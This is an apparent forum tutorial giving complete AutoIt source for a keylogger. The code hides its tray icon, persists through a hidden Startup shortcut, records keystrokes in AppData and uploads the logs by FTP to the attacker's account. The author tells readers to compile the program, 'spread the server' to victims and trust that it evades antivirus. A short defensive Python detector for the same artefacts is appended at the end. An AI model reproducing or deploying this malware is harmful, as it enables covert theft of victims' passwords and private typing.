Things you will need:
Au3 Scripting Language
A computer
Working Internet connection
SciTE(recommended), or notepad.
1. Create a DriveHQ account
Go here and create an account. E-mail verification is required. If you already have an account, it is extremely recommended that you create one only for keylogger use.
After you have signed up and verified your e-mail, you're done with this part.
2. Access the FTP
Now, open a blank page in your web browser. And type the code in the URL bar as follows:
Code:
Example: ftp://DriveHQUsername:DriveHQPassword@drivehq.ftp.com
After you did that, you should end up with a screen that looks somewhat like this:
[Image: image.jpg]
This is what you will be using to access your logs. Every computer that is logged will have its own directory within the FTP named after their computer name.
3. Create the Keylogger Server
This is the technical and fun part. This is where you create your server using Au3.
First, fire up SciTE. Go to the directory where you installed Au3, find the SciTE folder, then click on the SciTE application. SciTE view should look like this:
[Image: image.jpg]
After you fired up SciTE, copy this code (this is the server code) into the editor:
Code:
#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <File.au3>
#include <Misc.au3>
#include <FTPEx.au3>
;Coded by Kush
Global $Save, $Num, $Server, $Username, $Password
$Server = "ServerName"
$Username = "FtpServerUsername"
$Password = "FtpServerPassword"
Logging()
Func Logging()
AutoItSetOption("TrayIconHide", 1)
$Shortcut = FileCreateShortcut(@AutoItExe, @StartupDir & "\" & @ScriptName & ".lnk")
FileSetAttrib($Shortcut, "+H")
$Save = @AppDataDir & "/" & "Log" & $Num & ".txt"
_FileCreate($Save)
While 2
Local $DLL = DllOpen("user32.dll")
If _IsPressed("41", $DLL) Then FileWrite($Save, "a")
While _IsPressed("41", $DLL)
WEnd
If _IsPressed("08", $DLL) Then FileWrite($Save, "BACKSPACE ")
While _IsPressed("08", $DLL)
WEnd
If _IsPressed("09", $DLL) Then FileWrite($Save, @TAB)
While _IsPressed("09", $DLL)
WEnd
If _IsPressed("0D", $DLL) Then FileWrite($Save, @CRLF)
While _IsPressed("0D", $DLL)
WEnd
If _IsPressed("20", $DLL) Then FileWrite($Save, " ")
While _IsPressed("20", $DLL)
WEnd
If _IsPressed("30", $DLL) Then FileWrite($Save, "0")
While _IsPressed("30", $DLL)
WEnd
If _IsPressed("31", $DLL) Then FileWrite($Save, "1")
While _IsPressed("31", $DLL)
WEnd
If _IsPressed("32", $DLL) Then FileWrite($Save, "2")
While _IsPressed("32", $DLL)
WEnd
If _IsPressed("33", $DLL) Then FileWrite($Save, "3")
While _IsPressed("33", $DLL)
WEnd
If _IsPressed("34", $DLL) Then FileWrite($Save, "4")
While _IsPressed("34", $DLL)
WEnd
If _IsPressed("35", $DLL) Then FileWrite($Save, "5")
While _IsPressed("35", $DLL)
WEnd
If _IsPressed("36", $DLL) Then FileWrite($Save, "6")
While _IsPressed("36", $DLL)
WEnd
If _IsPressed("37", $DLL) Then FileWrite($Save, "7")
While _IsPressed("37", $DLL)
WEnd
If _IsPressed("38", $DLL) Then FileWrite($Save, "8")
While _IsPressed("38", $DLL)
WEnd
If _IsPressed("39", $DLL) Then FileWrite($Save, "9")
While _IsPressed("39", $DLL)
WEnd
If _IsPressed("42", $DLL) Then FileWrite($Save, "b")
While _IsPressed("42", $DLL)
WEnd
If _IsPressed("43", $DLL) Then FileWrite($Save, "c")
While _IsPressed("43", $DLL)
WEnd
If _IsPressed("44", $DLL) Then FileWrite($Save, "d")
While _IsPressed("44", $DLL)
WEnd
If _IsPressed("45", $DLL) Then FileWrite($Save, "e")
While _IsPressed("45", $DLL)
WEnd
If _IsPressed("46", $DLL) Then FileWrite($Save, "f")
While _IsPressed("46", $DLL)
WEnd
If _IsPressed("47", $DLL) Then FileWrite($Save, "g")
While _IsPressed("47", $DLL)
WEnd
If _IsPressed("48", $DLL) Then FileWrite($Save, "h")
While _IsPressed("48", $DLL)
WEnd
If _IsPressed("49", $DLL) Then FileWrite($Save, "i")
While _IsPressed("49", $DLL)
WEnd
If _IsPressed("4A", $DLL) Then FileWrite($Save, "j")
While _IsPressed("4A", $DLL)
WEnd
If _IsPressed("4B", $DLL) Then FileWrite($Save, "k")
While _IsPressed("4B", $DLL)
WEnd
If _IsPressed("4C", $DLL) Then FileWrite($Save, "l")
While _IsPressed("4C", $DLL)
WEnd
If _IsPressed("4D", $DLL) Then FileWrite($Save, "m")
While _IsPressed("4D", $DLL)
WEnd
If _IsPressed("4F", $DLL) Then FileWrite($Save, "o")
While _IsPressed("4F", $DLL)
WEnd
If _IsPressed("50", $DLL) Then FileWrite($Save, "p")
While _IsPressed("50", $DLL)
WEnd
If _IsPressed("51", $DLL) Then FileWrite($Save, "q")
While _IsPressed("51", $DLL)
WEnd
If _IsPressed("52", $DLL) Then FileWrite($Save, "r")
While _IsPressed("52", $DLL)
WEnd
If _IsPressed("53", $DLL) Then FileWrite($Save, "s")
While _IsPressed("53", $DLL)
WEnd
If _IsPressed("54", $DLL) Then FileWrite($Save, "t")
While _IsPressed("54", $DLL)
WEnd
If _IsPressed("55", $DLL) Then FileWrite($Save, "u")
While _IsPressed("55", $DLL)
WEnd
If _IsPressed("56", $DLL) Then FileWrite($Save, "v")
While _IsPressed("56", $DLL)
WEnd
If _IsPressed("57", $DLL) Then FileWrite($Save, "w")
While _IsPressed("57", $DLL)
WEnd
If _IsPressed("58", $DLL) Then FileWrite($Save, "x")
While _IsPressed("58", $DLL)
WEnd
If _IsPressed("59", $DLL) Then FileWrite($Save, "y")
While _IsPressed("59", $DLL)
WEnd
If _IsPressed("5A", $DLL) Then FileWrite($Save, "z")
While _IsPressed("5A", $DLL)
WEnd
If _IsPressed("BA", $DLL) Then FileWrite($Save, ";")
While _IsPressed("BA", $DLL)
WEnd
If _IsPressed("BB", $DLL) Then FileWrite($Save, "=")
While _IsPressed("BB", $DLL)
WEnd
If _IsPressed("BC", $DLL) Then FileWrite($Save, ",")
While _IsPressed("BC", $DLL)
WEnd
If _IsPressed("BD", $DLL) Then FileWrite($Save, "-")
While _IsPressed("BD", $DLL)
WEnd
If _IsPressed("BE", $DLL) Then FileWrite($Save, ".")
While _IsPressed("BE", $DLL)
WEnd
If _IsPressed("BF", $DLL) Then FileWrite($Save, "/")
While _IsPressed("BF", $DLL)
WEnd
If _IsPressed("C0", $DLL) Then FileWrite($Save, "`")
While _IsPressed("C0", $DLL)
WEnd
If _IsPressed("DB", $DLL) Then FileWrite($Save, "[")
While _IsPressed("DB", $DLL)
WEnd
If _IsPressed("DC", $DLL) Then FileWrite($Save, "\")
While _IsPressed("DC", $DLL)
WEnd
If _IsPressed("DD", $DLL) Then FileWrite($Save, "]")
While _IsPressed("DD", $DLL)
WEnd
If _IsPressed("4E", $DLL) Then FileWrite($Save, "n")
While _IsPressed("4E", $DLL)
WEnd
If _IsPressed("10", $DLL) Then FileWrite($Save, "SHFT")
While _IsPressed("10", $DLL)
WEnd
If _IsPressed("25", $DLL) Then FileWrite($Save, "<")
While _IsPressed("25", $DLL)
WEnd
If _IsPressed("26", $DLL) Then FileWrite($Save, "^")
While _IsPressed("26", $DLL)
WEnd
If _IsPressed("27", $DLL) Then FileWrite($Save, ">")
While _IsPressed("27", $DLL)
WEnd
If _IsPressed("28", $DLL) Then FileWrite($Save, "*")
While _IsPressed("28", $DLL)
WEnd
$LogFileSize = FileGetSize($Save)
While $LogFileSize = 5120
$Num += 1
$Dir = _FTP_CreateDir(@ComputerName)
_FTP_FileSend($Server, $Username, $Password, $Save, "/" & @ComputerName & "/" & $Num)
FileDelete($Save)
Call("Logging")
WEnd
WEnd
EndFunc ;==>Logging
Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)
$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)
_FTP_FilePut($oConnect, $LocFile, $RemFile)
_FTP_Close($oFTP)
EndFunc ;==>_FTP_FileSend
Func _FTP_CreateDir($DirName)
$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)
_FTP_DirCreate($oConnect, $DirName)
_FTP_Close($oFTP)
EndFunc ;==>_FTP_CreateDir
NOTE: Remember that the log files in the FTP are named Log1, Log2, Log3, etc.
Now you're thinking, "What fuckery is this? What the hell am I supposed to do with THAT?" That's easy. First, don't run it. Second, in the beginning of the code, find these three variables:
[Image: image.jpg]
Replace the first one with "ftp.drivehq.com" (WITH the quotes), the second with your DriveHQ username, and the third with your DriveHQ password. It should look like this:
Code:
$Server = "ftp.drivehq.com"
$Username = "herp"
$Password = "derp"
After you did that, save the file anywhere. Then compile it into an "exe".
[Image: Untitled.jpg]
You're done. Now you just have to spread the server before you start receiving logs. DO NOT CLICK THE EXE, unless you want to log yourself forever. The EXE is completely FUD (Fully Undetectable) so it won't be detected by any anti-virus software.
4. Self-Test (Optional)
To test the file on yourself, delete lines 19, 21, 22, and replace "@AppDataDir" in line 24 with "@DesktopDir". The lines are shown below:
[Image: Untitled3.jpg]
Then replace "5130" with "20" in line 252 as shown below:
[Image: Untitled.jpg]
This is done so all infection is removed and you don't accidentally infect yourself and the log file is saved to your Desktop for easy deletion. The second replacement is so the log file uploads to the FTP after it has 20 characters, then it deletes itself and creates another copy. If you want to stop the script, simply go to your tray and right click the au3 icon, then click "exit".
Keylogger Explanation and Process
This keylogger works by uploading files to an FTP. What it first does is it creates a text file in the user's "AppData" directory in which the logs will be captured. After that file reaches 5 kilobytes (thus 5130 bytes), it crosses over to the FTP, then it deletes itself, then an empty successor is created, only to cross over and to be deleted again. Quite simple actually.
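From the defender's side, the behaviour described above (a shortcut in the Startup folder, a Log<N>.txt file in AppData, an FTP connection, then deletion of the log) is a chain that can be correlated per process. The following is an added example, not part of the original post; the event field names, paths and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for the artefacts the walkthrough describes (default Windows profile layout assumed).
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
APPDATA_LOG = re.compile(r"\\AppData\\Roaming[\\/]Log\d*\.txt$", re.I)

def classify(ev):
    """Map one telemetry event to the behaviour it evidences, or None."""
    kind, target = ev["type"], ev.get("target", "")
    if kind == "file_create" and STARTUP_LNK.search(target):
        return "startup_persistence"
    if kind == "file_create" and APPDATA_LOG.search(target):
        return "appdata_keylog_file"
    if kind == "file_delete" and APPDATA_LOG.search(target):
        return "log_deleted_after_upload"
    if kind == "net_connect" and ev.get("dport") == 21:  # 21 = FTP control port
        return "ftp_connection"
    return None

def detect(events, required=("appdata_keylog_file", "ftp_connection")):
    """Return {image: behaviours} for processes that show every required behaviour."""
    seen = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label:
            seen[ev["image"]].add(label)
    return {img: sorted(b) for img, b in seen.items() if set(required) <= b}

# Constructed sample events (simplified fields, not a real log schema).
ROAMING = r"C:\Users\amy\AppData\Roaming"
SUSPECT = r"C:\Users\amy\Downloads\update.exe"
EVENTS = [
    {"type": "file_create", "image": SUSPECT,
     "target": ROAMING + r"\Microsoft\Windows\Start Menu\Programs\Startup\update.exe.lnk"},
    {"type": "file_create", "image": SUSPECT, "target": ROAMING + "/Log.txt"},
    {"type": "net_connect", "image": SUSPECT, "dport": 21},
    {"type": "file_delete", "image": SUSPECT, "target": ROAMING + "/Log.txt"},
    # Benign look-alikes: an FTP client, and an app that only adds a Startup shortcut.
    {"type": "net_connect", "image": r"C:\Program Files\FtpClient\ftp.exe", "dport": 21},
    {"type": "file_create", "image": r"C:\Program Files\Chat\chat.exe",
     "target": ROAMING + r"\Microsoft\Windows\Start Menu\Programs\Startup\chat.lnk"},
]

if __name__ == "__main__":
    for image, behaviours in detect(EVENTS).items():
        print(image, "->", ", ".join(behaviours))
```

Requiring the log file and the FTP connection from the same process keeps ordinary FTP clients and ordinary Startup shortcuts from alerting on their own.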